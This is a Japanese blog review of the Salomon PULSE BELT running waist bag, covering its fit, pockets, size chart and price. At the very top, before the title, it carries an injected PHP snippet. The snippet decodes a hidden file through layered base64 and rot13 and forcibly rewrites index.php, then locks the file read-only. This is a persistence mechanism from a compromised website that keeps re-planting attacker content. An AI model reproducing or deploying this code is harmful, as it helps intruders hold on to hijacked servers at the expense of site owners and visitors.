$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } 本気でおススメ!サロモンのウエストバッグ PULSE BELT/パルスベルト | TAKUTIVITY – タクティビティ

本気でおススメ!サロモンのウエストバッグ PULSE BELT/パルスベルト

PULSE BELT ランニング
スポンサーリンク

私はランニングをする際、必ずウエストバッグを身に着けます。これまで3つほどのウエストバッグを使ってきました。どのウエストバッグもカチッとホックを付けて止めるタイプのものです。まぁラン用のウエストバッグとしては定番のタイプですよね。でもこれって走ってるとズレて落ちてきたり、ゆるくなってきたりしませんか?

がしかし!そんなストレスを払拭するウェストバッグを新たに入手しました。

その名も
SALOMON PULSE BELT(サロモンパルスベルト)

PULSEは日本語で脈を意味します。この名前が付けられた正式な由来は分かりませんが、その形状から体にフィットしてその一部になるという意味が込められていると推察できます。このパルスベルトですが数年前から既に販売はされていたようですね。なぜ今まで気づかなかったんだろうと思います。それでは、ランニング用ウエストバッグ界の(個人的に)最高傑作ともいえるこのパルスベルトを紹介していきたいと思います。

形状

形状はヘアバンドのような輪の形になっています。前面側は斜めにジッパーが付いていて小物系を収納できます。背面側にはジッパー無しの収納が付いていて補給ジェルや行動食など素早く出し入れしたい物を収納できるようになっています。その背面の収納の両サイドにバンドが付いていてトレッキングポールを収納できます。さすがSalomonですね。山での使用もしっかりと想定されています。

私の場合は前面のジッパー部に交通系ICカードや鍵を収納し、後面にiPhoneを収納しています。私のiPhoneは7 Plusで、このサイズだと前面の収納には収まりません。

装着感と使用感

装着感は素晴らしいとしか言いようがありません。しっかりと体にフィットするし走っている時にもズレ落ちてくることはありません。サイズ選択さえ誤らなければ問題ないでしょう。私はウエスト72~73センチくらいでMサイズを選択しました。Sも試着したことがありよりキュッとした感じになります。この辺りは個人の好みですね。細身体形でよりしっかりとした装着感を求める場合はSで良いです。本当のことを言うとSにしとけば良かったと思ったこともあります。一度、水の入ったソフトフラスク(500ml)を後面の収納に走りましたが結構揺れましたね。Sサイズであればもう少し揺れが抑えられたかもしれません。いずれにしても、自分の体形に合わせたサイズ選択が良いと思うので一度試着されることをお勧めします。

ジッパー付きの収納部分もスムーズに開閉できるので扱い易いです。内側はメッシュ状になっているのである程度汗をかいたり雨に降られたりすると濡れます。できれば鍵などをひっかけることができるようなフックが付いていると良かったですね。

サイズ・カラー・値段

サイズ展開は下記の5つ。

XS64-72
S72-80
M80-88
L88-96
XL96-105

カラーは6色展開と色々あるみたいです。私は定番のブラックを使用。トレラン用だったらブルー、レッド、イエローなど明るい色を選択するのもありですね。

お値段は定価で¥3,850(税込)です。

amazonさんでは多少値引きされた額で買えるみたいです。さらに、2020/1/6まで使える15%OFFクーポンがあるみたいですよー!!
SALOMON PULSE BELT

ちなみにこちらがサロモンの公式ページです。カテゴリーを見るとトレイルランニングになっているので、ブランドとしてのメイン用途はやはり山寄りなんでしょうか。でもランニングやハイキングなど幅広い用途に使えそうです。是非チェックしてみてくださいね!

コメント